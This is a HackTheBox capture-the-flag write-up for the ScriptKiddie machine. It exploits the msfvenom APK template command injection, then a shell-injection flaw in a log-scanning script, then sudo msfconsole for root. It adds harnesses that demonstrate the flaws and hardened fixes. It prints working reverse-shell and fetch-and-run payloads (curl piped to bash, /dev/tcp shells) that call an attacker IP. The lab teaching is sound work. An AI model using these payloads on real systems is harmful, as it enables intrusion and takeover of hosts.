ScriptKiddie

📅 Last Updated: Jul 08, 2025 07:14 | 📄 Size: 3.2 KB | 🎯 Type: HackTheBox Writeup

1, Enumerate ports and web content

22/tcp   ssh
5000/tcp http   Werkzeug httpd 0.16.1 (Python 3.8.5)

To be honest, I think this version of Werkzeug must have some exploits: Werkzeug - 'Debug Shell' Command Execution, https://github.com/its-arun/Werkzeug-Debug-RCE.git

From the index page we can see this is a site that wraps nmap, Metasploit payload generation (msfvenom) and searchsploit, with a form for each.

So let's check for command injection. Given that all three of these seem to be running binaries from a Linux system, I'll try command injection in each input, but without luck. Any non-alphanumeric characters in the searchsploit box lead to this warning: "stop hacking me - well hack you back".

So instead we look for vulnerabilities in nmap and Metasploit themselves. Checking Exploit-DB, there is nothing high-risk for nmap, but for Metasploit there is something interesting: "Metasploit Framework 6.0.11 - msfvenom APK template command injection" (EDB-ID 49491, CVE-2020-7384). When msfvenom builds an Android payload from a user-supplied APK template, it reads the template's signing certificate and interpolates the certificate's distinguished name into a keytool command string that is run through a shell, so a crafted CN in that certificate executes arbitrary commands on the host running msfvenom. That is a clean RCE, and this site's msfvenom form takes a template upload.

2, User shell

So let's exploit it!

Metasploit itself has a module that generates the malicious APK (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection); we only need to upload the resulting file as the template.

At this point I have to say I was cursing 0xdf: why could I not get my shell to work?!

So instead I used another way: `searchsploit -m multiple/local/49491.py`, then changed the payload in the script:

# Change me
payload = 'curl 10.10.14.65/shell.sh|bash'

and created shell.sh, which the payload fetches over HTTP from the attack box and pipes into bash:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.65/1337 0>&1

Serve shell.sh on port 80 of the attack box (the curl has no port, so it defaults to 80), start a listener on port 1337, run the script to produce the malicious APK, and upload that APK as the template in the site's msfvenom form.

Then we finally get the user shell.
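To see what the APK template bug actually abuses, here is an added example of my own; it is not code from this writeup, from 49491.py or from Metasploit. It assumes the vulnerable path built the keytool command as one string with the template certificate's distinguished name interpolated inside single quotes and handed that string to a shell, and it replaces keytool with a stand-in that only records its arguments, so nothing real is signed. The marker file, the stand-in and the CN value are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not code from the writeup, 49491.py or Metasploit): reproduces the
# injection pattern behind the msfvenom APK-template bug. Assumption: the vulnerable code
# built a keytool command line as one string with the certificate DN interpolated into it
# and ran that string through a shell. A stand-in keytool that only logs its argv is used.
set -eu

work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT

# Stand-in keytool: writes the arguments it received, one per line, to KEYTOOL_LOG.
cat > "$work/keytool" <<'EOF'
#!/bin/sh
printf '%s\n' "$@" > "${KEYTOOL_LOG:?}"
EOF
chmod +x "$work/keytool"
PATH="$work:$PATH"; export PATH
KEYTOOL_LOG="$work/keytool.log"; export KEYTOOL_LOG

# Marker file that only appears if attacker-controlled text gets executed as a command.
marker="$work/pwned"
injection_fired() {
    if [ -e "$marker" ]; then rm -f "$marker"; echo yes; else echo no; fi
}

# Vulnerable shape: the DN is dropped inside single quotes in a string that sh re-parses.
vulnerable_genkey() {
    sh -c "keytool -genkey -keyalg RSA -keysize 2048 -dname '$1'"
}

# Hardened shape: the DN is a single argv element; no shell ever treats it as syntax.
safe_genkey() {
    keytool -genkey -keyalg RSA -keysize 2048 -dname "$1"
}

# A certificate subject as an attacker would craft it: the quote closes -dname's argument,
# the pipe starts a second command, and '#' comments out the dangling quote that follows.
evil_dname="CN='|touch $marker #"

vulnerable_genkey "$evil_dname"
echo "string + sh -c : injection fired = $(injection_fired)"   # yes
safe_genkey "$evil_dname"
echo "argv           : injection fired = $(injection_fired)"   # no
echo "argv keytool received the DN literally: $(tail -n 1 "$KEYTOOL_LOG")"
```

The hardened function is the class of fix needed: pass the DN as its own argument vector element so no shell re-parses it, and treat anything read out of an uploaded file (here the certificate subject) as untrusted data rather than as part of a command line.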

3, Root shell

There is another user, pwn, and an interesting script of theirs:

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Reviewing the script: it sets log to /home/kid/logs/hackers, a file that kid can write to, then changes into /home/pwn. It cats the log, splits each line on spaces and keeps field three onward, dedups the result with sort -u, and reads each value into ip, which is interpolated into a string handed to sh -c that runs nmap against it in the background. Finally, if the log is non-empty it is truncated. The flaw is that ${ip} lands unquoted inside a string that sh re-parses, so whatever kid writes into the third field of the log is evaluated as shell syntax by pwn: a $(...) substitution there runs as pwn before nmap even starts. Note that sh -c means /bin/sh, which is why the payload below wraps the bash-only &> redirection in bash -c.

Now that I understood what the script was doing, I should be able to craft a payload that gets executed. By echoing a payload to the /home/kid/logs/hackers file, the payload should get executed. However, I need to ensure that the payload is within the third field of the log. I started a netcat listener on port 1338 and then used echo to add the following payload to the log file.

kid@scriptkiddie:~$ echo 'a b $(bash -c "bash -i &>/dev/tcp/10.10.14.65/443 0>&1")' > /home/kid/logs/hackers
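The injection above, reproduced in a harness I added for this writeup (it is not the box's script): the loop keeps the same shape as pwn's, but nmap is replaced by a stand-in that only records the target it was asked to scan, the trailing & is dropped so results are deterministic, the log format (date, time, then the field the script trusts) is assumed, and the sample log lines are constructed. A hardened rewrite follows the vulnerable loop.

```shell
#!/bin/sh
# Added example (not the box's script): a harness reproducing the injection in pwn's
# scanner loop, plus a hardened rewrite. nmap is a stand-in that only logs its arguments,
# so nothing is scanned. The log format is assumed and the sample lines are constructed.
set -eu

work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT
cd "$work"
mkdir recon

# Stand-in nmap: appends the command line it received to NMAP_LOG.
cat > "$work/nmap" <<'EOF'
#!/bin/sh
echo "nmap $*" >> "${NMAP_LOG:?}"
EOF
chmod +x "$work/nmap"
PATH="$work:$PATH"; export PATH
NMAP_LOG="$work/nmap.log"; export NMAP_LOG

# Marker file that only appears if text from the log gets executed as a command.
marker="$work/pwned"
injection_fired() {
    if [ -e "$marker" ]; then rm -f "$marker"; echo yes; else echo no; fi
}

log="$work/hackers"
# Constructed log: one honest line, one line whose third field carries a command substitution.
printf '%s\n' "2021-02-03 16:58:23 10.10.14.65" "a b \$(touch $marker)" > "$log"

# Same shape as the original loop: field 3 onward is interpolated unquoted into a string
# that sh -c re-parses, so the $(...) taken from the log is expanded by that shell.
vulnerable_scan() {
    cut -d' ' -f3- "$1" | sort -u | while read ip; do
        sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null"
    done
}

# Hardened: take exactly one field, accept only digits and dots in a plausible shape, and
# pass the value to nmap as an argument instead of through a shell string.
safe_scan() {
    cut -d' ' -f3 "$1" | sort -u | while read -r ip; do
        case $ip in
            ''|*[!0-9.]*|.*|*.|*..*)
                echo "rejected: $ip" >> rejected.log
                continue ;;
        esac
        nmap --top-ports 10 -oN "recon/$ip.nmap" "$ip" 2>&1 >/dev/null
    done
}

vulnerable_scan "$log"
echo "original loop : injection fired = $(injection_fired)"   # yes
safe_scan "$log"
echo "hardened loop : injection fired = $(injection_fired)"   # no
```

Validating the field and passing it as an argument closes the injection, but the design problem remains: a process running as pwn executes work items from a file another, lower-privileged user owns and can rewrite. The scan targets should be written somewhere kid cannot touch, or pwn should stop trusting that file at all.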

Then we get the pwn shell and we can check the sudo -l

Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

With that in mind, I launched Metasploit with sudo and then dropped into the Ruby shell as root, which allowed me to capture the root flag.

sudo /opt/metasploit-framework-6.0.9/msfconsole
irb
system("/bin/bash")

Then we can run /bin/bash as root